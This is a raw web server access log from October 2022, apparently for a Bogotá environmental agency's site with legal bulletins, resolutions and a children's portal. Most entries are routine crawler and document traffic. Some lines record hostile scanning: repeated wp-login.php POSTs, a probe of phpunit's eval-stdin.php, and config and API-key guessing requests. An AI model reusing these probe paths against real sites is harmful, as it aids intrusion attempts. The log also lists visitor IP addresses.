172.22.2.4 - - [14/Oct/2022:01:50:21 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2022:01:52:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:51:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:53:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:52:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
207.46.13.177 - - [14/Oct/2022:01:54:29 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 87926
172.22.2.4 - - [14/Oct/2022:01:55:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_ANALISIS%20JURISPRUDENCIA%20C-634-12%20DECOMISO.docx HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2022:01:57:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:58:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:57:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:57:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
216.245.221.92 - - [14/Oct/2022:02:02:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:03:02 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [14/Oct/2022:02:03:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:02:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:04:54 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [14/Oct/2022:02:03:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
191.108.35.175 - - [14/Oct/2022:02:06:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1019.pdf HTTP/1.1" 200 2097536
216.245.221.92 - - [14/Oct/2022:02:07:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:08:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:09:08 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
207.46.13.190 - - [14/Oct/2022:02:10:04 -0500] "GET /BLA/resoluciones/00000314.tif HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:02:08:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.241.216.148 - - [14/Oct/2022:02:11:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:02:09:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [14/Oct/2022:02:12:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:13:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2022:02:13:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
191.108.35.175 - - [14/Oct/2022:02:14:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1455.pdf HTTP/1.1" 200 914797
172.22.2.4 - - [14/Oct/2022:02:14:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:15:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [14/Oct/2022:02:17:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:18:04 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:06 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:06 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:18:06 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [14/Oct/2022:02:18:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:18:24 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
207.46.13.89 - - [14/Oct/2022:02:19:03 -0500] "GET /BLA/resoluciones/AUTOS%202017/4079.pdf HTTP/1.1" 200 1099473
185.119.81.103 - - [14/Oct/2022:02:20:47 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Oct/2022:02:20:48 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [14/Oct/2022:02:20:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43375
201.245.192.253 - - [14/Oct/2022:02:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43099
216.245.221.92 - - [14/Oct/2022:02:22:23 -0500] "HEAD / HTTP/1.1" 200 -
191.108.35.175 - - [14/Oct/2022:02:22:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 182499
172.22.2.4 - - [14/Oct/2022:02:21:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [14/Oct/2022:02:23:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
66.249.73.97 - - [14/Oct/2022:02:25:28 -0500] "-" 408 -
216.245.221.92 - - [14/Oct/2022:02:27:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:26:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:28:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:27:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
172.22.2.4 - - [14/Oct/2022:02:31:03 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [14/Oct/2022:02:31:04 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:04 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:04 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/Oct/2022:02:31:05 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [14/Oct/2022:02:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43375
201.245.192.253 - - [14/Oct/2022:02:32:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43099
216.245.221.92 - - [14/Oct/2022:02:32:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:33:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:32:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:32:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
173.252.83.116 - - [14/Oct/2022:02:34:36 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera3P.jpg HTTP/1.1" 200 31355
207.46.13.89 - - [14/Oct/2022:02:36:24 -0500] "GET /BLA/resoluciones/00000879.tif HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:02:37:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:38:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:37:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:39:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:02:39:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/Oct/2022:02:38:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [14/Oct/2022:02:39:08 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 54003
172.22.2.4 - - [14/Oct/2022:02:40:51 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [14/Oct/2022:02:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43375
201.245.192.253 - - [14/Oct/2022:02:42:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43099
216.245.221.92 - - [14/Oct/2022:02:42:23 -0500] "HEAD / HTTP/1.1" 200 -
191.108.35.175 - - [14/Oct/2022:02:42:42 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.108.35.175 - - [14/Oct/2022:02:42:47 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 247450
191.108.35.175 - - [14/Oct/2022:02:42:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2879.pdf HTTP/1.1" 200 619779
201.245.192.253 - - [14/Oct/2022:02:43:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:02:41:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
172.22.2.4 - - [14/Oct/2022:02:44:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1043
172.22.2.4 - - [14/Oct/2022:02:44:40 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Oct/2022:02:45:10 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1037
172.22.2.4 - - [14/Oct/2022:02:43:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:44:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [14/Oct/2022:02:45:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/Oct/2022:02:44:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45693
172.22.2.4 - - [14/Oct/2022:02:44:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
172.22.2.4 - - [14/Oct/2022:02:46:21 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
191.108.35.175 - - [14/Oct/2022:02:46:34 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.108.35.175 - - [14/Oct/2022:02:46:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 247450
172.22.2.4 - - [14/Oct/2022:02:46:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/Oct/2022:02:45:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
216.245.221.92 - - [14/Oct/2022:02:47:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:48:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
185.119.81.103 - - [14/Oct/2022:02:49:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Oct/2022:02:49:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
60.191.125.35 - - [14/Oct/2022:02:49:59 -0500] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:50:48 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [14/Oct/2022:02:49:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:50:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
216.245.221.92 - - [14/Oct/2022:02:52:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:02:53:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
207.46.13.190 - - [14/Oct/2022:02:55:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES119.tif HTTP/1.1" 200 73502
172.22.2.4 - - [14/Oct/2022:02:55:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.43.163.58 - - [14/Oct/2022:02:57:10 -0500] "GET /api.php?key=1&apikey=1 HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:02:57:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:02:56:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
201.245.192.253 - - [14/Oct/2022:02:58:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:00:55 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1037
216.245.221.92 - - [14/Oct/2022:03:02:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:01:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:03:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:02:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
207.46.13.84 - - [14/Oct/2022:03:03:50 -0500] "GET /BLA/resoluciones/AUTOS%202022/0972.pdf HTTP/1.1" 200 357748
45.61.185.198 - - [14/Oct/2022:03:04:14 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
66.249.73.127 - - [14/Oct/2022:03:04:39 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:03:05:56 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:03:05:57 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:03:06:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
45.33.88.63 - - [14/Oct/2022:03:06:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.88.63 - - [14/Oct/2022:03:06:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.88.63 - - [14/Oct/2022:03:06:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [14/Oct/2022:03:06:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [14/Oct/2022:03:07:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:08:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:07:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:09:08 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2022:03:07:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
152.89.196.211 - - [14/Oct/2022:03:11:53 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:03:12:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:13:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
35.240.117.238 - - [14/Oct/2022:03:13:51 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
35.240.117.238 - - [14/Oct/2022:03:14:00 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
35.240.117.238 - - [14/Oct/2022:03:14:09 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
35.240.117.238 - - [14/Oct/2022:03:14:18 -0500] "GET /portaldeninos/aire/ HTTP/1.1" 200 88215
35.240.117.238 - - [14/Oct/2022:03:14:27 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 88494
172.22.2.4 - - [14/Oct/2022:03:12:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
35.240.117.238 - - [14/Oct/2022:03:14:35 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 87569
35.240.117.238 - - [14/Oct/2022:03:14:44 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 87926
35.240.117.238 - - [14/Oct/2022:03:14:53 -0500] "GET /portaldeninos/residuos HTTP/1.1" 301 -
35.240.117.238 - - [14/Oct/2022:03:14:53 -0500] "GET /portaldeninos/residuos/ HTTP/1.1" 200 87443
35.240.117.238 - - [14/Oct/2022:03:15:02 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
35.240.117.238 - - [14/Oct/2022:03:15:11 -0500] "GET /portaldeninos/fauna/ HTTP/1.1" 200 88429
35.240.117.238 - - [14/Oct/2022:03:15:19 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 97198
172.22.2.4 - - [14/Oct/2022:03:13:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
35.240.117.238 - - [14/Oct/2022:03:15:38 -0500] "GET /portaldeninos/humedales-ramsar/ HTTP/1.1" 200 89255
35.240.117.238 - - [14/Oct/2022:03:15:47 -0500] "GET /portaldeninos/humedal-santa-maria-del-lago/ HTTP/1.1" 200 88988
35.240.117.238 - - [14/Oct/2022:03:15:55 -0500] "GET /portaldeninos/contactanos/ HTTP/1.1" 200 88135
35.240.117.238 - - [14/Oct/2022:03:16:04 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
35.240.117.238 - - [14/Oct/2022:03:16:13 -0500] "GET /portaldeninos/relatos-urbanos-de-los-ecosistemas-bogotanos-2/ HTTP/1.1" 200 88374
35.240.117.238 - - [14/Oct/2022:03:16:30 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93768
207.46.13.84 - - [14/Oct/2022:03:16:40 -0500] "GET /BLA/resoluciones/AUTOS%202011/5570.pdf HTTP/1.1" 200 233911
35.240.117.238 - - [14/Oct/2022:03:16:39 -0500] "GET /portaldeninos/humedal-juan-amarillo-2/ HTTP/1.1" 200 88155
35.240.117.238 - - [14/Oct/2022:03:16:49 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
35.240.117.238 - - [14/Oct/2022:03:16:58 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
216.245.221.92 - - [14/Oct/2022:03:17:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:17:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:18:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
120.21.49.45 - - [14/Oct/2022:03:20:48 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
172.22.2.4 - - [14/Oct/2022:03:19:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
201.245.192.253 - - [14/Oct/2022:03:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:03:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43130
216.245.221.92 - - [14/Oct/2022:03:22:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:22:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:24:08 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 304 -
157.55.39.142 - - [14/Oct/2022:03:25:42 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:03:24:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:25:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50799
216.245.221.92 - - [14/Oct/2022:03:27:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:27:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
80.94.92.239 - - [14/Oct/2022:03:28:32 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:03:28:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/Oct/2022:03:30:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:03:32:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [14/Oct/2022:03:32:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43130
207.46.13.40 - - [14/Oct/2022:03:32:07 -0500] "GET /BLA/resoluciones/00001790.tif HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:03:32:22 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:31:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
201.245.192.253 - - [14/Oct/2022:03:32:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
216.245.221.92 - - [14/Oct/2022:03:37:22 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:36:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:37:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:37:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.202 - - [14/Oct/2022:03:39:10 -0500] "GET /BLA/resoluciones/00001774.tif HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2022:03:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:03:42:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43130
216.245.221.92 - - [14/Oct/2022:03:42:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:42:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:42:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.83.8 - - [14/Oct/2022:03:44:23 -0500] "GET /galeria/galeria/fotos/Entrenube2P.jpg HTTP/1.1" 200 8416
172.22.2.4 - - [14/Oct/2022:03:42:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [14/Oct/2022:03:47:10 -0500] "GET /Publicaciones/2022EE27455.pdf HTTP/1.1" 404 227
172.22.2.4 - - [14/Oct/2022:03:45:37 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 57291
216.245.221.92 - - [14/Oct/2022:03:47:22 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.97 - - [14/Oct/2022:03:47:42 -0500] "-" 408 -
201.245.192.253 - - [14/Oct/2022:03:47:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:03:47:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:03:49:56 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
152.89.196.211 - - [14/Oct/2022:03:49:59 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:03:50:00 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 200 311468
172.22.2.4 - - [14/Oct/2022:03:48:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
216.245.221.92 - - [14/Oct/2022:03:52:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:52:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
207.46.13.190 - - [14/Oct/2022:03:54:05 -0500] "GET /bla/resoluciones/resoluciones%202009/0029.pdf HTTP/1.1" 200 467430
172.22.2.4 - - [14/Oct/2022:03:54:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Oct/2022:03:54:08 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2022:03:53:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
108.174.2.215 - - [14/Oct/2022:03:55:23 -0500] "GET /images/Liberacion-%20caribe.jpg HTTP/1.1" 200 40014
172.22.2.4 - - [14/Oct/2022:03:54:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [14/Oct/2022:03:57:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:03:57:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
